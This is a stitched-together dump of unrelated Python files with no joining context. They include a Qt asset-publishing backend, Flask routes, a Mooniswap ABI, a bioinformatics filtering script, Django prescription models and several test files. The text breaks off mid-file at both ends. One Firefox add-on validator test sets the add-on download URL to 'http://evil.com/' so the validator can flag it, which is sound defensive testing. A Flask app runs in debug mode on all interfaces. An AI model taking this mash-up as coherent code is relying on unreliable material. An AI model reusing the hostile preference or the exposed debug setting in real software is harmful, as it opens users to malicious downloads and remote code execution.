qtc.Signal(float) class PublishComponentsThread(qtc.QRunnable): def 
__init__(self, assetsdata):
        super(PublishComponentsThread, self).__init__()
        self.signals = PublishComponentsSignals()
        self.assets_data = assetsdata

    def run(self):
        published_assets = []
        for i, asset in enumerate(self.assets_data):
            progress = fit_range(i, 0, len(self.assets_data) - 1, 0.05, 1.0)
            print 'progress: {}'.format(progress)
            time.sleep(1)
            published_assets.append(asset['assetName'])
            self.signals.progress.emit(progress)
        self.signals.completed.emit(published_assets)


class Backend(qtc.QObject):

    dataRetrieved = qtc.Signal('QVariantList')
    publishProgress = qtc.Signal(float)
    publishCompleted = qtc.Signal('QVariantList')

    def __init__(self):
        super(Backend, self).__init__()

    @qtc.Slot(str, 'QVariantList')
    def publish(self, dept, assetsdata):
        print 'publish()'
        print 'dept:'
        print dept
        print 'data:'
        pp.pprint(assetsdata)

        print fit_range(5.0, 0.0, 10.0, 0.0, 1.0)
        print fit_range(1.0, 0.0, 10.0, 0.0, 1.0)
        print fit_range(9.0, 0.0, 10.0, 0.0, 1.0)
        print fit_range(100.0, 0.0, 100.0, 0.0, 1.0)
        print fit_range(33.0, 0.0, 50.0, 0.0, 1.0)

        publish_thread = PublishComponentsThread(assetsdata)
        publish_thread.signals.completed.connect(self.on_publish_completed)
        publish_thread.signals.progress.connect(self.on_publish_progress)
        qtc.QThreadPool.globalInstance().start(publish_thread)

    def on_publish_progress(self, value):
        self.publishProgress.emit(value)

    def on_publish_completed(self, assets):
        self.publishCompleted.emit(assets)

    @qtc.Slot('QVariant')
    def parseDraggedFiles(self, urllist):
        print 'parseDraggedFile()'
        print urllist
        render_layers = {}

        for url in urllist:
            print url.path()
            current_asset = None

            for root, dirnames, filenames in os.walk(url.path()):
                # Workaround for a MacOS bug of os.path.basename
                current_root = root[:-1] if root.endswith('/') else root
                dir_name = os.path.basename(current_root)

                if RENDER_LAYER_REGEX.match(dir_name):
                    current_asset = dir_name
                    print 'current_asset: {}'.format(current_asset)

                if current_asset not in render_layers and current_asset is not None:
                    render_layers[current_asset] = {}
                    render_layers[current_asset]['assetName'] = current_asset
                    render_layers[current_asset]['assetIsChecked'] = True
                    render_layers[current_asset]['assetComponents'] = []

                frames = sorted(
                    filter(lambda f: ACCEPTED_EXTENSIONS_REGEX.match(f), filenames))

                if frames:
                    first_frame_num = re.findall(r'\d+', os.path.basename(frames[0]))[0]
                    end_frame_num = re.findall(r'\d+', os.path.basename(frames[-1]))[0]
                    # original read "pass_name = os.(root)", which is not valid Python;
                    # the pass name is assumed to be the name of the frames' directory
                    pass_name = os.path.basename(root)
                    frame_name = frames[0].split('.')[0]
                    frame_ext = frames[0].split('.')[-1]
                    print 'frame name: %s' % frame_name
                    padding = '#' * len(first_frame_num.split('.')[-1])
                    render_layers[current_asset]['assetComponents'].append({
                        'passName': pass_name,
                        'startFrame': first_frame_num,
                        'endFrame': end_frame_num,
                        'path': '%s.%s.%s' % (frame_name, padding, frame_ext),
                        'passIsChecked': True
                    })

        # pp.pprint(render_layers)
        returned_layers = []
        for asset_name, asset_dict in render_layers.iteritems():
            returned_layers.append(asset_dict)
        # pp.pprint(returned_layers)

        self.dataRetrieved.emit(
            sorted(returned_layers, key=lambda e: e['assetName']))


def main():
    # sys.argv += ['--style', 'material']
    app = qtg.QGuiApplication(sys.argv)
    engine = qml.QQmlApplicationEngine()
    backend = Backend()
    engine.rootContext().setContextProperty('backend', backend)
    engine.load(qtc.QUrl(os.path.join(CURRENT_DIR, 'main.qml')))
    if not engine.rootObjects():  # rootObjects is a method and must be called
        sys.exit(-1)
    sys.exit(app.exec_())


if __name__ == '__main__':
    main()


0
import datetime
import time


def now_ts():
    return int(round(datetime.datetime.now().timestamp()))


def ts2str(ts, 
format='%Y-%m-%d %H:%M:%S'): return time.strftime(format, time.localtime(ts)) def str2ts(s, format='%Y-%m-%d %H:%M:%S'): return int(time.mktime(time.strptime(s, format))) 0 from flask import Flask, render_template, Response app = Flask(__name__) @app.route('/') def index(): return render_template("index.html") @app.route('/fighting') def fighting(): return render_template("fighting.html") @app.route('/moba') def moba(): return render_template("moba.html") @app.route('/platforming') def platforming(): return render_template("platforming.html") @app.route('/racing') def racing(): return render_template("racing.html") @app.route('/rpg') def rpg(): return render_template("rpg.html") @app.route('/shooter') def shooter(): return render_template("shooter.html") if __name__ == "__main__": app.run(host='0.0.0.0', debug=True) 10-100 mooniswap_abi = [ { "inputs": [ {"internalType": "contract IERC20", "name": "_token0", "type": "address"}, {"internalType": "contract IERC20", "name": "_token1", "type": "address"}, {"internalType": "string", "name": "name", "type": "string"}, {"internalType": "string", "name": "symbol", "type": "string"}, { "internalType": "contract IMooniswapFactoryGovernance", "name": "_mooniswapFactoryGovernance", "type": "address", }, ], "stateMutability": "nonpayable", "type": "constructor", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "owner", "type": "address", }, { "indexed": True, "internalType": "address", "name": "spender", "type": "address", }, { "indexed": False, "internalType": "uint256", "name": "value", "type": "uint256", }, ], "name": "Approval", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "user", "type": "address", }, { "indexed": False, "internalType": "uint256", "name": "decayPeriod", "type": "uint256", }, { "indexed": False, "internalType": "bool", "name": "isDefault", "type": "bool", }, { "indexed": False, "internalType": "uint256", "name": "amount", "type": "uint256", }, ], "name": "DecayPeriodVoteUpdate", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "sender", "type": "address", }, { "indexed": True, "internalType": "address", "name": "receiver", "type": "address", }, { "indexed": False, "internalType": "uint256", "name": "share", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "token0Amount", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "token1Amount", "type": "uint256", }, ], "name": "Deposited", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": False, "internalType": "string", "name": "reason", "type": "string", } ], "name": "Error", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "user", "type": "address", }, { "indexed": False, "internalType": "uint256", "name": "fee", "type": "uint256", }, { "indexed": False, "internalType": "bool", "name": "isDefault", "type": "bool", }, { "indexed": False, "internalType": "uint256", "name": "amount", "type": "uint256", }, ], "name": "FeeVoteUpdate", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "previousOwner", "type": "address", }, { "indexed": True, "internalType": "address", "name": "newOwner", "type": "address", }, ], "name": "OwnershipTransferred", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", 
"name": "user", "type": "address", }, { "indexed": False, "internalType": "uint256", "name": "slippageFee", "type": "uint256", }, { "indexed": False, "internalType": "bool", "name": "isDefault", "type": "bool", }, { "indexed": False, "internalType": "uint256", "name": "amount", "type": "uint256", }, ], "name": "SlippageFeeVoteUpdate", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "sender", "type": "address", }, { "indexed": True, "internalType": "address", "name": "receiver", "type": "address", }, { "indexed": True, "internalType": "address", "name": "srcToken", "type": "address", }, { "indexed": False, "internalType": "address", "name": "dstToken", "type": "address", }, { "indexed": False, "internalType": "uint256", "name": "amount", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "result", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "srcAdditionBalance", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "dstRemovalBalance", "type": "uint256", }, { "indexed": False, "internalType": "address", "name": "referral", "type": "address", }, ], "name": "Swapped", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": False, "internalType": "uint256", "name": "srcBalance", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "dstBalance", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "fee", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "slippageFee", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "referralShare", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "governanceShare", "type": "uint256", }, ], "name": "Sync", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "from", "type": "address", }, { "indexed": True, "internalType": "address", "name": "to", "type": "address", }, { "indexed": False, "internalType": "uint256", "name": "value", "type": "uint256", }, ], "name": "Transfer", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "sender", "type": "address", }, { "indexed": True, "internalType": "address", "name": "receiver", "type": "address", }, { "indexed": False, "internalType": "uint256", "name": "share", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "token0Amount", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "token1Amount", "type": "uint256", }, ], "name": "Withdrawn", "type": "event", }, { "inputs": [ {"internalType": "address", "name": "owner", "type": "address"}, {"internalType": "address", "name": "spender", "type": "address"}, ], "name": "allowance", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "address", "name": "spender", "type": "address"}, {"internalType": "uint256", "name": "amount", "type": "uint256"}, ], "name": "approve", "outputs": [{"internalType": "bool", "name": "", "type": "bool"}], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [{"internalType": "address", "name": "account", "type": "address"}], "name": "balanceOf", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": 
"decayPeriod", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [{"internalType": "uint256", "name": "vote", "type": "uint256"}], "name": "decayPeriodVote", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [{"internalType": "address", "name": "user", "type": "address"}], "name": "decayPeriodVotes", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "decimals", "outputs": [{"internalType": "uint8", "name": "", "type": "uint8"}], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "address", "name": "spender", "type": "address"}, {"internalType": "uint256", "name": "subtractedValue", "type": "uint256"}, ], "name": "decreaseAllowance", "outputs": [{"internalType": "bool", "name": "", "type": "bool"}], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [ {"internalType": "uint256[2]", "name": "maxAmounts", "type": "uint256[2]"}, {"internalType": "uint256[2]", "name": "minAmounts", "type": "uint256[2]"}, ], "name": "deposit", "outputs": [ {"internalType": "uint256", "name": "fairSupply", "type": "uint256"}, { "internalType": "uint256[2]", "name": "receivedAmounts", "type": "uint256[2]", }, ], "stateMutability": "payable", "type": "function", }, { "inputs": [ {"internalType": "uint256[2]", "name": "maxAmounts", "type": "uint256[2]"}, {"internalType": "uint256[2]", "name": "minAmounts", "type": "uint256[2]"}, {"internalType": "address", "name": "target", "type": "address"}, ], "name": "depositFor", "outputs": [ {"internalType": "uint256", "name": "fairSupply", "type": "uint256"}, { "internalType": "uint256[2]", "name": "receivedAmounts", "type": "uint256[2]", }, ], "stateMutability": "payable", "type": "function", }, { "inputs": [], "name": "discardDecayPeriodVote", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [], "name": "discardFeeVote", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [], "name": "discardSlippageFeeVote", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [], "name": "fee", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [{"internalType": "uint256", "name": "vote", "type": "uint256"}], "name": "feeVote", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [{"internalType": "address", "name": "user", "type": "address"}], "name": "feeVotes", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "contract IERC20", "name": "token", "type": "address"} ], "name": "getBalanceForAddition", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "contract IERC20", "name": "token", "type": "address"} ], "name": "getBalanceForRemoval", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "contract IERC20", "name": "src", "type": "address"}, {"internalType": "contract IERC20", "name": "dst", "type": "address"}, {"internalType": "uint256", "name": "amount", "type": "uint256"}, ], "name": "getReturn", "outputs": 
[{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "getTokens", "outputs": [ {"internalType": "contract IERC20[]", "name": "tokens", "type": "address[]"} ], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "address", "name": "spender", "type": "address"}, {"internalType": "uint256", "name": "addedValue", "type": "uint256"}, ], "name": "increaseAllowance", "outputs": [{"internalType": "bool", "name": "", "type": "bool"}], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [], "name": "mooniswapFactoryGovernance", "outputs": [ { "internalType": "contract IMooniswapFactoryGovernance", "name": "", "type": "address", } ], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "name", "outputs": [{"internalType": "string", "name": "", "type": "string"}], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "owner", "outputs": [{"internalType": "address", "name": "", "type": "address"}], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "renounceOwnership", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [ {"internalType": "contract IERC20", "name": "token", "type": "address"}, {"internalType": "uint256", "name": "amount", "type": "uint256"}, ], "name": "rescueFunds", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [ { "internalType": "contract IMooniswapFactoryGovernance", "name": "newMooniswapFactoryGovernance", "type": "address", } ], "name": "setMooniswapFactoryGovernance", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [], "name": "slippageFee", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [{"internalType": "uint256", "name": "vote", "type": "uint256"}], "name": "slippageFeeVote", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [{"internalType": "address", "name": "user", "type": "address"}], "name": "slippageFeeVotes", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "contract IERC20", "name": "src", "type": "address"}, {"internalType": "contract IERC20", "name": "dst", "type": "address"}, {"internalType": "uint256", "name": "amount", "type": "uint256"}, {"internalType": "uint256", "name": "minReturn", "type": "uint256"}, {"internalType": "address", "name": "referral", "type": "address"}, ], "name": "swap", "outputs": [{"internalType": "uint256", "name": "result", "type": "uint256"}], "stateMutability": "payable", "type": "function", }, { "inputs": [ {"internalType": "contract IERC20", "name": "src", "type": "address"}, {"internalType": "contract IERC20", "name": "dst", "type": "address"}, {"internalType": "uint256", "name": "amount", "type": "uint256"}, {"internalType": "uint256", "name": "minReturn", "type": "uint256"}, {"internalType": "address", "name": "referral", "type": "address"}, {"internalType": "address payable", "name": "receiver", "type": "address"}, ], "name": "swapFor", "outputs": [{"internalType": "uint256", "name": "result", "type": "uint256"}], "stateMutability": "payable", "type": "function", }, { "inputs": [], "name": "symbol", "outputs": [{"internalType": "string", "name": "", "type": "string"}], "stateMutability": "view", "type": "function", }, 
{ "inputs": [], "name": "token0", "outputs": [{"internalType": "contract IERC20", "name": "", "type": "address"}], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "token1", "outputs": [{"internalType": "contract IERC20", "name": "", "type": "address"}], "stateMutability": "view", "type": "function", }, { "inputs": [{"internalType": "uint256", "name": "i", "type": "uint256"}], "name": "tokens", "outputs": [{"internalType": "contract IERC20", "name": "", "type": "address"}], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "totalSupply", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "address", "name": "recipient", "type": "address"}, {"internalType": "uint256", "name": "amount", "type": "uint256"}, ], "name": "transfer", "outputs": [{"internalType": "bool", "name": "", "type": "bool"}], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [ {"internalType": "address", "name": "sender", "type": "address"}, {"internalType": "address", "name": "recipient", "type": "address"}, {"internalType": "uint256", "name": "amount", "type": "uint256"}, ], "name": "transferFrom", "outputs": [{"internalType": "bool", "name": "", "type": "bool"}], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [{"internalType": "address", "name": "newOwner", "type": "address"}], "name": "transferOwnership", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [{"internalType": "contract IERC20", "name": "", "type": "address"}], "name": "virtualBalancesForAddition", "outputs": [ {"internalType": "uint216", "name": "balance", "type": "uint216"}, {"internalType": "uint40", "name": "time", "type": "uint40"}, ], "stateMutability": "view", "type": "function", }, { "inputs": [{"internalType": "contract IERC20", "name": "", "type": "address"}], "name": "virtualBalancesForRemoval", "outputs": [ {"internalType": "uint216", "name": "balance", "type": "uint216"}, {"internalType": "uint40", "name": "time", "type": "uint40"}, ], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "virtualDecayPeriod", "outputs": [ {"internalType": "uint104", "name": "", "type": "uint104"}, {"internalType": "uint104", "name": "", "type": "uint104"}, {"internalType": "uint48", "name": "", "type": "uint48"}, ], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "virtualFee", "outputs": [ {"internalType": "uint104", "name": "", "type": "uint104"}, {"internalType": "uint104", "name": "", "type": "uint104"}, {"internalType": "uint48", "name": "", "type": "uint48"}, ], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "virtualSlippageFee", "outputs": [ {"internalType": "uint104", "name": "", "type": "uint104"}, {"internalType": "uint104", "name": "", "type": "uint104"}, {"internalType": "uint48", "name": "", "type": "uint48"}, ], "stateMutability": "view", "type": "function", }, { "inputs": [{"internalType": "contract IERC20", "name": "", "type": "address"}], "name": "volumes", "outputs": [ {"internalType": "uint128", "name": "confirmed", "type": "uint128"}, {"internalType": "uint128", "name": "result", "type": "uint128"}, ], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "uint256", "name": "amount", "type": "uint256"}, {"internalType": "uint256[]", "name": "minReturns", "type": "uint256[]"}, ], "name": "withdraw", "outputs": [ { 
"internalType": "uint256[2]", "name": "withdrawnAmounts", "type": "uint256[2]", } ], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [ {"internalType": "uint256", "name": "amount", "type": "uint256"}, {"internalType": "uint256[]", "name": "minReturns", "type": "uint256[]"}, {"internalType": "address payable", "name": "target", "type": "address"}, ], "name": "withdrawFor", "outputs": [ { "internalType": "uint256[2]", "name": "withdrawnAmounts", "type": "uint256[2]", } ], "stateMutability": "nonpayable", "type": "function", }, ] thodk/proteostasis_imprinting_across_evolution0 # -*- coding: utf-8 -*- import pandas import os from constant_variables import define_main_dir from constant_variables import ensembl_classes def collect_data(main_dir, species_abbr, hsp): try: f = main_dir+'ensembl_data/'+hsp+'_raw_files/'+species_abbr+'.tsv' df = pandas.read_csv(f, sep='\t', index_col=0) ensembl_ids = df.ensembl_gene_id.tolist() except (IOError, AttributeError): ensembl_ids = [] try: f = main_dir+'uniprot_data/'+hsp+'_raw_files/'+species_abbr+'.tsv' df = pandas.read_csv(f, sep='\t', index_col=0) uniprot_ids = df.id.tolist() except (IOError, AttributeError): uniprot_ids = [] return {'ensembl':ensembl_ids, 'uniprot':uniprot_ids} def worker(ensembl_class): main_dir = define_main_dir(ensembl_class) output_dir = main_dir+'filtered_HSPs_annotation/' files_dir = main_dir+'files/' # load the organism names and get their abbreviations df = pandas.read_csv(files_dir+'final_species_names.tsv', sep='\t', index_col=0) # 1. for each abbreviation search if there are available annotation for the HSPs # 2. use of 'collect_data' data function to search in the 'raw' folders annotation_results = [] data = {} for species_abbr in df.abbreviation.tolist(): hsp70_annotation = collect_data(main_dir, species_abbr, 'hsp70') hsp40_annotation = collect_data(main_dir, species_abbr, 'hsp40') data.update({species_abbr : {'hsp70':hsp70_annotation, 'hsp40':hsp40_annotation}}) # True if count of annotated hsp70 > 0 s70 = False if sum([len(i) for i in hsp70_annotation.values()]) == 0 else True # True if count of annotated hsp40 > 0 s40 = False if sum([len(i) for i in hsp40_annotation.values()]) == 0 else True annotation_results.append([species_abbr, s70, s40]) columns = ['abbreviation', 'hsp70_bool', 'hsp40_bool'] df = pandas.DataFrame(annotation_results, columns=columns) if not os.path.exists(output_dir): os.makedirs(output_dir) pos_bool1 = df.hsp70_bool == True pos_bool2 = df.hsp40_bool == True # 1. combine the two booleans to check if True & True and filter the organisms # 2. save the data frame for the following steps filtered_df = df.loc[((pos_bool1) & (pos_bool2)), :] filtered_df.to_csv(main_dir+'01_species_with_HSPs_annotation.tsv', sep='\t') # save the HSPs annotation for each organism in the 'filtered_hsp_annotation' # folder. Each data frame should contain protein id, hsp family name, database for species_abbr in filtered_df.abbreviation.tolist(): tmp_annotation = data[species_abbr] tmp_list = [] for hsp, tmp_dict in tmp_annotation.items(): # key: ensembl or uniprot # hsp: hsp40 or hsp70 # ids: protein ids for key, ids in tmp_dict.items(): tmp_list = tmp_list + [[i,hsp,key] for i in ids] tmp_df = pandas.DataFrame(tmp_list, columns=['gene_symbol', 'hsp', 'resource']) tmp_df.to_csv(output_dir+species_abbr+'.tsv', sep='\t') ''' DESCRIPTION: That script reads the HSP annotations from UniProt and Ensembl databases, as they have been retrieved with scripts 10A and 10B. 
The annotated entries are gather together to examine which species have adequate annotation and which should be filtrered out. Two outputs: 1. 01_organisms_with_HSPs_annotation.tsv : contains only the species with annotation. They passed the first filtering. In order to be included in the final set of species, for the analysis, they should also pass the filtering for rRNA data and genomic annotation 2. 'filtered_HSPs_annotation/': contains the annotation file for each species: example: gene_symbol hsp resource Q03751 hsp40 uniprot Q9VPQ2 hsp40 uniprot P82910 hsp70 uniprot Q9VG58 hsp70 uniprot It will be used to retrieve the fasta files in the next steps ''' if __name__ == "__main__": # execute the worker for each ensembl class [worker(c) for c in ensembl_classes] from datetime import datetime from random import randint from statistics import mode from tkinter import CASCADE from django.db import models def random_string(): return str(randint(1000, 9999)) class adres(models.Model): miasto = models.CharField(max_length=50) kod_pocztowy = models.CharField(max_length=6) ulica = models.CharField(max_length=250) nr_domu = models.CharField(max_length=5) nr_mieszkania = models.CharField(max_length=4) def __str__(self): return f'{self.miasto}, {self.ulica} {self.nr_domu}' class Meta: verbose_name="Adres" verbose_name_plural="Adresy" ordering= ("miasto",) class osoba(models.Model): imie = models.CharField(max_length=50) nazwisko = models.CharField(max_length=50) pesel= models.CharField(max_length=11) is_staff=models.BooleanField(default=False) specjalizacja=models.CharField(max_length=100) adres=models.ForeignKey(adres, on_delete=models.CASCADE) def __str__(self): return f'{self.nazwisko}, {self.imie}' class Meta: verbose_name="Osoba" verbose_name_plural="Osoby" ordering= ("nazwisko",) class recepta(models.Model): kod_recepty=random_string() pacjent=models.ForeignKey(osoba, related_name='pacjent', on_delete=models.CASCADE) wystawca=models.ForeignKey(osoba, on_delete=models.CASCADE) data_wystawienia= models.DateTimeField(auto_now_add=True) def __str__(self): return f'{self.kod_recepty}' class Meta: verbose_name="Recepta" verbose_name_plural="Recepty" ordering= ("-data_wystawienia",) # payment_fraction = models.IntegerField(validators=[MinValueValidator(0), MaxValueValidator(100)]) class przepisane_leki(models.Model): recepta=models.ForeignKey(recepta, on_delete=models.CASCADE) nazwa_leku=models.CharField(max_length=250) dawkowanie=models.CharField(max_length=2000) odplatnosc=models.IntegerField() def __str__(self): return f'{self.nazwa_leku.upper()}' class Meta: verbose_name="Lek" verbose_name_plural="Leki" ordering= ("nazwa_leku",) from .core import * __author_name__ = "" __author_email__ = "" __author__ = "%s <%s>" % (__author_name__, __author_email__) __license__ = "MIT" __version__ = '0.3.0' VERSION = tuple(map(int, __version__.split('.'))) 10-100 from .codes import Code from .helpers import is_channel_name from .logging import get_logger from .message import Message from .modules import BaseModule, BaseResponder, ConfigMixin, \ BaseMessageDispatcherMixin, StandardMessageDispatcherMixin, \ AdminMessageDispatcherMixin from .signals import message_in, admin_message_in, message_out, on_exception, \ module_load, module_unload, module_loaded, module_unloaded, config_reload, \ config_reloaded, config_changed sunbenxin/saltdoc/_ext/saltdocs.py def setup(app): """Additions and customizations to Sphinx that are useful for documenting the Salt project. 
""" app.add_crossref_type(directivename="conf_master", rolename="conf_master", indextemplate="pair: %s; conf/master") app.add_crossref_type(directivename="conf_minion", rolename="conf_minion", indextemplate="pair: %s; conf/minion") app.add_crossref_type(directivename="conf-log", rolename="conf-log", indextemplate="pair: %s; conf/logging") #!/usr/bin/env python3 from .hostparse import * __version__ = "0.0.6" # -*- coding: utf-8 -*- """Module unittests.test_functions.test_parameter.py""" from compliance_suite.functions.parameter import * from compliance_suite.elements.content_case import ContentCase from unittests.methods import * import compliance_suite.config.constants as c runner_p, node_p, case_params_p = get_runner_node_case_params_by_case( "Search Projects With All Filters") runner_p.retrieved_server_settings["projects"]["supp_filters"] = [ "version", "name"] runner_e, node_e, case_params_e = get_runner_node_case_params_by_case( "Expressions Ticket - All Filters") runner_e.retrieved_server_settings["expressions"]["supp_filters"] = [ "studyID", "version"] runner_e.retrieved_server_settings["expressions"]["exp_format"] = "loom" runner_c, node_c, case_params_c = get_runner_node_case_params_by_case( "Continuous Ticket - All Filters") runner_e.retrieved_server_settings["continuous"]["supp_filters"] = [ "studyID", "version"] runner_e.retrieved_server_settings["continuous"]["exp_format"] = "tsv" continuous_search = get_runner_node_case_params_by_case( "Multi Continuous Ticket - Continuous Slice by chr, start, end, 1" ) content_case_continuous_search = ContentCase( continuous_search[2], continuous_search[1], continuous_search[0]) def test_all_supported_filters(): filters = all_supported_filters(node_p, runner_p) assert filters["version"] == "1.0" assert filters["name"] == "RNAgetTestProject0" def test_first_supported_filter(): filters = first_supported_filter(node_p, runner_p) assert len(filters) == 1 assert filters["name"] == "RNAgetTestProject0" def test_second_supported_filter(): filters = second_supported_filter(node_p, runner_p) assert len(filters) == 1 assert filters["version"] == "1.0" def test_third_supported_filter(): filters = third_supported_filter(node_p, runner_p) assert len(filters) == 1 assert filters["version"] == "1.0" def test_incorrect_filter_values(): filters = incorrect_filter_values(node_p, runner_p) assert filters["name"] == c.NONEXISTENT_ID assert filters["version"] == c.NONEXISTENT_ID def test_add_format_from_retrieved_settings(): filters = add_format_from_retrieved_settings(node_e, runner_e) assert len(filters) == 1 assert filters["format"] == "loom" def test_all_supported_filters_and_format_from_retrieved_settings(): filters = all_supported_filters_and_format_from_retrieved_settings( node_e, runner_e) assert filters["format"] == "loom" assert filters["version"] == "1.0" assert filters["studyID"] == "f3ba0b59bed0fa2f1030e7cb508324d1" def test_first_supported_filter_and_format(): filters = first_supported_filter_and_format(node_e, runner_e) assert len(filters) == 2 assert filters["format"] == "loom" assert filters["studyID"] == "f3ba0b59bed0fa2f1030e7cb508324d1" def test_second_supported_filter_and_format(): filters = second_supported_filter_and_format(node_e, runner_e) assert len(filters) == 2 assert filters["format"] == "loom" assert filters["version"] == "1.0" def test_incorrect_filters_and_format(): filters = incorrect_filters_and_format(node_e, runner_e) assert filters["format"] == c.NONEXISTENT_ID assert filters["studyID"] == c.NONEXISTENT_ID def 
test_switch_format_param(): filters = switch_format_param(node_e, runner_e) assert filters["format"] == "tsv" filters = switch_format_param(node_c, runner_c) assert filters["format"] == "loom" def test_all_supported_filters_chr_start_end(): filters = all_supported_filters_format_chr_start_end( content_case_continuous_search) fk = filters.keys() assert "chr" in fk assert "start" in fk assert "end" in fk assert filters["chr"] == "chr1" assert filters["start"] == "30" assert filters["end"] == "50" marevol/kgglrkgglr/parquet.py # coding: utf-8 import pyarrow.parquet as pq import pyarrow as pa def to_parquet(data_df, filename): print(f'Saving {filename}') table = pa.Table.from_pandas(data_df) pq.write_table(table, filename) def read_parquet(filename): print(f'Loading {filename}') table = pq.read_table(filename) return table.to_pandas() tests/test_js_prefs.py from js_helper import _do_test_raw def test_pref_innocuous_branch(): """ Tests that innocuous preferences created outside of the "extensions." branch from defaults/preferences/*.js files throw warnings, and that ones created in proper branches don't. """ assert _do_test_raw(""" pref("foo.bar", true); """, path='defaults/preferences/prefs.js').failed() assert _do_test_raw(""" user_pref("foo.bar", true); """, path='defaults/preferences/prefs.js').failed() assert _do_test_raw(""" pref("extensions.foo-bar", true); """, path='defaults/preferences/prefs.js').failed() assert not _do_test_raw(""" pref("extensions.foo-bar.baz", true); """, path='defaults/preferences/prefs.js').failed() def test_unicode_pref(): """Tests that non-ASCII preferences do not cause errors.""" assert not _do_test_raw(""" pref("extensions.foo-bar.\u263a", true); """, path='defaults/preferences/prefs.js').failed() assert not _do_test_raw(""" pref("extensions.foo-bar.\\u263a", true); """, path='defaults/preferences/prefs.js').failed() def test_pref_dangerous_branch(): """ Test that preferences created in dangerous branches from defaults/preferences/*.js files throw warnings. """ assert _do_test_raw(""" pref("extensions.getAddons.get.url", "http://evil.com/"); """, path='defaults/preferences/prefs.js').failed() assert _do_test_raw(""" user_pref("extensions.getAddons.get.url", "http://evil.com/"); """, path='defaults/preferences/prefs.js').failed() 10-100 from ..varint import write_varint from ..writer import write_binary_str class SettingType(object): @classmethod def write(cls, value, buf): raise NotImplementedError class SettingUInt64(SettingType): @classmethod def write(cls, value, buf): write_varint(int(value), buf) class SettingBool(SettingType): @classmethod def write(cls, value, buf): write_varint(bool(value), buf) class SettingString(SettingType): @classmethod def write(cls, value, buf): write_binary_str(value, buf) class SettingChar(SettingType): @classmethod def write(cls, value, buf): write_binary_str(value[0], buf) class SettingFloat(SettingType): @classmethod def write(cls, value, buf): """ Float is written in string representation. 
